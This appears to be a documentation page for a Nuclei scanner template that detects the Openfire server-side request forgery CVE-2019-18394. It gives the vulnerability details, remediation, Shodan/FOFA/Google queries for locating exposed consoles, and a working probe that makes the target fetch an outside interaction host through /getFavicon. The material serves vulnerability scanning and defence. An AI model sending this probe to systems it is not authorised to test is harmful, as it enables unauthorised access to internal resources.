Skip to content
Nuclei Templates

Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery

ID: CVE-2019-18394

Severity: critical

Author: pdteam

Tags: cve,cve2019,ssrf,openfire,oast,igniterealtime

Description

Section titled “Description”

Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.

YAML Source

Section titled “YAML Source”
id: CVE-2019-18394


info:
  name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
  author: pdteam
  severity: critical
  description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://github.com/igniterealtime/Openfire/pull/1497
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18394
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18394
    cwe-id: CWE-918
    epss-score: 0.70889
    epss-percentile: 0.98041
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,ssrf,openfire,oast,igniterealtime


http:
  - method: GET
    path:
      - "{{BaseURL}}/getFavicon?host=http://oast.fun/"


    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Interactsh Server')"
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100befba9a9ad77698ec07213ab51f8c3a8a2c18c7c328b00d9c60c6c3b3640ae15022019003c9f432deb1e617ad9e8d0b18512a10cf469854e2e5ff5bb6ed680d66864:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-18394.yaml"

View on Github